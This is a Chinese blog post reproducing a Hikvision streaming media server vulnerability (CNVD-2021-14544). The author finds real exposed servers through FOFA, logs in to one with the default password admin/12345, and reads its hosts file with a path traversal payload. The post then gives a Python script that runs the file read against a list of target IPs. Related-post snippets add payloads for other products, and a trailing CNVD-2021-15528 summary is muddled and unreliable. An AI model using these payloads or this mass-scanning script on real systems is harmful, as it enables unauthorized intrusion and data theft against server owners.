CNVD-2021-14544 漏洞复现

最新推荐文章于 2024-06-06 14:01:55 发布
原创 最新推荐文章于 2024-06-06 14:01:55 发布 · 5.4k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #漏洞复现 #web安全

本文详细介绍了海康威视流媒体管理服务器存在的弱口令和任意文件读取漏洞,影响版本为V2.3.5。作者通过fofa搜索引擎找到目标,利用默认弱口令admin/12345登录,并展示了如何使用Burpsuite进行任意文件读取,成功下载了系统中的hosts文件。同时,提供了Python PoC代码供读者参考,强调了持续的安全测试和防护的重要性。

大四的生活忙忙碌碌,在绿盟实习和忙毕设,让我划水A了半年,今天写一下最近申请零组文库邀请码,提交的复现文章叭.
贵有恒何必三更眠五更起,最无益只怕一日曝十日寒
话不多说,快上车。

海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544)

1.漏洞说明
海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。
杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。
2.影响版本
杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5
3.漏洞复现
又是熟悉的面向搜索引擎测试
打开fofa搜索引擎:https://fofa.so/
Fofa搜索标题:title="流媒体管理服务器"
在这里插入图片描述
这个漏洞的突破点在于弱口令,默认的口令为admin/12345
登录到管理界面之后才能利用该漏洞进行任意文件读取.
首先打开fofa搜到的结果网站
在这里插入图片描述
通过弱口令admin/12345登录系统,这里猴子君试了7,8个网站,运气不错,遇到一个弱口令,登录进了管理界面.
在这里插入图片描述
看了一下,没有什么数据内容,应该是荒废已久的服务器.
选择左侧菜单栏中的维护管理-日志下载
在这里插入图片描述
这里可以看到下载功能,那么我们使用Burpsuite,设置代理,打开数据包拦截(intercept is on),然后再点击网站的下载按钮
在这里插入图片描述
这里的任意文件读取是在 fileName= 的后面.
修改fileName字段进行任意文件读取
Payload:

/systemLog/downFile.php?fileName=…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts

点击BurpsuiteForward,发现Chrome浏览器自动将这个文件下载下来了
在这里插入图片描述
查看一下下载的文件
在这里插入图片描述
打开文件看一下内容
在这里插入图片描述
确实是读取到了
下面附上大佬的POC(python):

# coding=utf-8
# CNVD-2021-14544
# 海康威视流媒体管理服务器任意文件读取
# Fofa:title="流媒体管理服务器"

import requests
import time
import urllib3
urllib3.disable_warnings()

def title():
        print("+-------------------------------------------------+")
        print("+-----------    CNVD-2021-14544   ----------------+")
        print("+-------   海康威视流媒体管理服务器任意文件读取   -----+")
        print("+--------  use: python3 CNVD-2021-14544.py -------+")
        print("+--------        Author: Henry4E36         -------+")
        print("+-------------------------------------------------+")

def target_url(url,filename):
    target_url = url + f"/systemLog/downFile.php?fileName=../../../../../../../{filename}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
    }

    try:
        res = requests.get(url=target_url,headers=headers,verify=False, timeout=5)
        if res.status_code == 200 and "window.history.back(-1)" in res.text:
            print("[----------------------------------------------]")
            print(f"[0]  目标系统: {url} 不存在该文件{filename}")
        elif res.status_code == 200:
            # 这里存在极大的误差,小heny不知道怎么判断了,有大佬知道的话可以交流哈 ^_^
            print("[----------------------------------------------]")
            print(f"\033[31m[!]  目标系统: {url} 存在任意文件读取!")
            print(f"[!] 正在读取文件:{filename} 中.......\033[0m")
            time.sleep(1)
            print(f"[-] 文件内容为:\n {res.text}")
        else:
            print("[----------------------------------------------]")
            print("[0] 目标系统连接失败!")

    except Exception as e:
        print("[----------------------------------------------]")
        print("[0]  目标系统出现意外情况!\n",e)


if __name__ == "__main__":
    title()
    filename = str(input("[-] 请输入需要读取的文件:\n"))
    with open("ip.txt","r") as urls:
        for url in urls:
            if url[:4] != "http":
                url = "http://" +url
            url = url.strip()
            target_url(url,filename)
    urls.close()

参考文章:https://mp.weixin.qq.com/s/t1ERU-LuhaDanCylbscWZQ

漏洞复现】科达 MTS转码服务器 任意文件读取漏洞
qq_67810151的博客
05-01 1165
科达 MTS转码服务器存在任意文件读取漏洞,攻击可以通过该漏洞读取服务器任意敏感信息,造成大量敏感信息泄露。
漏洞复现】Hikvision流媒体管理服务器后台文件读取漏洞
晚风不及你
01-25 934
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取【复现
ximo的博客
03-30 2903
简介 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 漏洞说明 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 漏洞复现 Fofa搜索标题: title="流媒体管理服务器" 找到存在弱口令的后台: admin/12345 在日志下载中进行抓包: 构造payload: ../../../../../../../windows/system32/drivers/etc/hosts 可进行下载。 ...
CNVD-2021-49104漏洞复现(泛微E-Office文件上传漏洞
dreamthe的博客
12-05 3255
1.靶场搭建 自己下载的e-office软件运行就行了
CNVD-2022-10270漏洞复现
weixin_42618425的博客
02-18 3733
CNVD-2022-10270漏洞复现
漏洞库:爬取CNNVD-国家信息安全漏洞
KEY0NE的个人博客
11-13 4027
CNNVD相对CNVD的爬取更简单一点,当前并未遇到明显的爬虫限制机制初步分析首先,还是使用我钟爱的爬虫框架——pyspider,选取first page作为起始页http://www.cnnvd.org.cn/web/vulnerability/querylist.tagCNNVD的页面只需要提交get请求即可递归访问到下一页下面进入到漏洞详情页,抓取需要的信息...
CNVD-2021-30167】用友NC BeanShell 漏洞复现CNVD-2021-30167)
千寻的博客
01-17 5407
用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
LfanBQX的博客
06-06 1949
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。3.网站访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面。2.FOFA上挑选一位存在CNVD-2021-30167漏洞的幸运儿,进行验证。(2)对BeanShell接口添加授权认证机制。貌似所有版本都存在。
CNVD-2021-09650:锐捷NBR路由器(guestIsUp.php)RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-15 1552
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
CNVD-2021-26422:亿邮电子邮件系统moni_detail.do远程命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
10-18 1243
北京亿中邮信息技术有限公司(亿邮)是一款专业的邮件系统软件及整体解决方案提供商。亿邮电子邮件系统远程命令执行漏洞,攻击者利用该漏洞可在未授权的情况实现远程命令执行,获取目标服务器权限。
php strus2 漏洞攻击_【安全提示】CNVD发布上周关注度较高的产品安全漏洞(20200810-20200816)...
weixin_36139240的博客
12-06 340
境外厂商产品漏洞1、Microsoft Excel缓冲区溢出漏洞(CNVD-2020-45184)Microsoft Excel是美国微软(Microsoft)公司的一款Office套件中的电子表格处理软件。Microsoft Excel(365 Apps for Enterprise)中存在缓冲区溢出漏洞,该漏洞源于程序没有正确处理内存对象。攻击者可利用该漏洞在当前用户的上下文中运行任意代码。参...
Fastjson反序列化RCE漏洞复现CNVD-2017-02833
afei001
10-10 1060
fastjson是一款用Java语言编写的高性能功能完善的JSON库。可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定se
CNVD-2018-24942漏洞复现
尼德霍格007
07-15 1092
CNVD-2018-24942漏洞复现 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 开始 打开靶场 http://45.159.48.193:42798/ 一个简单的getshell方法 远程代码执行 http://45.159.48.193:42798/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1
审计挖掘之CNVD通用漏洞
kali_Ma的博客
08-27 3547
前言 本次内容对cnvd通用漏洞库中的bagecms进行一个代码审计和漏洞复现,对cnvd漏洞库里的几处漏洞进行复现挖掘,发现几处新的漏洞点。本次实验为靶机环境。本次内容仅用于学习和研究,不可用于违法违规途径。 一、环境 在http://61.155.169.167:81/uploads/userup/1870/bagecms.zip上下载bagecms的源代码,将其放下phpstudy软件下,就能够搭建起一个web环境,然后导入.sql数据库备份文件到本地的数据库管理器。 自动化安装环境,访问http:/
Tomcat CVE-2020-1938(CNVD-2020-10487) 漏洞复现
weixin_43740200的博客
01-27 862
Tomcat CVE-2020-1938(CNVD-2020-10487) 漏洞复现 一、漏洞描述 Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。 2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞。Tom
CNVD-2019-22238:Fastjson 1.2.47 反序列化漏洞复现
冬的博客
03-16 2311
Fastjson 存在反序列化远程代码执行漏洞,当应用或系统使用 Fastjson 对由用户可控的 JSON 字符串数据进行解析时,将可能导致远程代码执行的危害。
[知识小节]复现cnvd收录的SQl注入漏洞
网络安全知识分享
10-27 9258
SQl注入漏洞复现 出于安全文章中不出现任何关于漏洞的真实url (1)我选择的扫描器是xary,报红如下: (2)使用sqlmap开始跑跑跑 思路:我们要做的就是搞到管理员的用户名和密码,因为不同公司的数据库存放的信息不同,有的数据库内容过多,跑数据的时候耗时特别长,所以当我们发现库名、表名有可能存放敏感信息的时候就要果断放弃无用的数据。 步骤: a、检测是否有注入 b、跑数据库名 c、跑表名 d、跑字段 e、跑字段中的数据 注:我们最后的到的用户名密码可能是经过加密的,我们可以试着用md5和base
spring framework远程代码执行漏洞复现CNVD-2022-23942 CVE-2022-22965)
yang1234567898的博客
04-18 7305
3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。 漏洞影响: JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..
泛微OA E-cology(CNVD-2019-32204)远程命令执行漏洞复现分析
洋洋的小黑屋
03-16 3045
漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令“whoami” 绕过方式: 1.unicode编码 2.字符串拼接 bsh.script=eval%00("ex"%2b"ec(bsh.httpSer...
CNVD-2021-15528
最新发布
02-26
### CNVD-2021-15528 漏洞详情 CNVD-2021-15528 是针对 Apache Shiro 的反序列化远程代码执行漏洞。此漏洞允许未经身份验证的攻击者发送特制请求来触发 Java 反序列化过程中的代码执行,从而完全控制目标服务器。 #### 影响范围 该漏洞主要影响使用了 Apache Shiro 进行会话管理的应用程序,特别是当应用程序启用了 RememberMe 功能时更为危险。具体受影响版本包括但不限于: - Apache Shiro 1.2.x 至 1.7.x 版本 #### FOFA 查询语句 为了帮助安全研究人员定位可能存在风险的服务实例,提供了如下 FOFA 查询条件: ```plaintext "title="Shiro Session Manager"" ``` #### 漏洞复现环境搭建 要重现这个漏洞,通常需要满足以下几个前提条件: - 应用程序开启了 RememberMe 功能; - 攻击者能够获取到有效的 rememberMe cookie 值; - 存在一个可被利用的对象图导航语言 (OGNL) 表达式注入点[^1]。 ### 安全公告 国家信息安全漏洞共享平台(CNVD)于 2021 年发布了有关此漏洞的通知,并强调其严重性和潜在危害。鉴于该漏洞可能带来的严重影响以及广泛的存在性,强烈建议所有相关方尽快采取行动以减轻风险。 ### 补丁与修复方法 对于存在此类安全隐患的产品和服务提供商而言,最直接有效的方式就是升级至不受影响的新版软件。Apache 官方已经意识到这个问题,在后续发布的版本中解决了这一缺陷。因此推荐的做法是: - 升级到最新的稳定发行版,如 Apache Shiro 1.8 或更高版本。 如果无法立即完成上述操作,则应考虑实施临时缓解措施,比如禁用 RememberMe 功能或将 OGNL 解析器设置为只读模式等策略。 另外,还可以通过配置 Web Application Firewall(WAF) 来阻止可疑流量进入系统内部网络区域,以此作为额外一层防护手段[^2]。 ```bash # 更新依赖库至最新版本 mvn install -U ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尐猴子君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值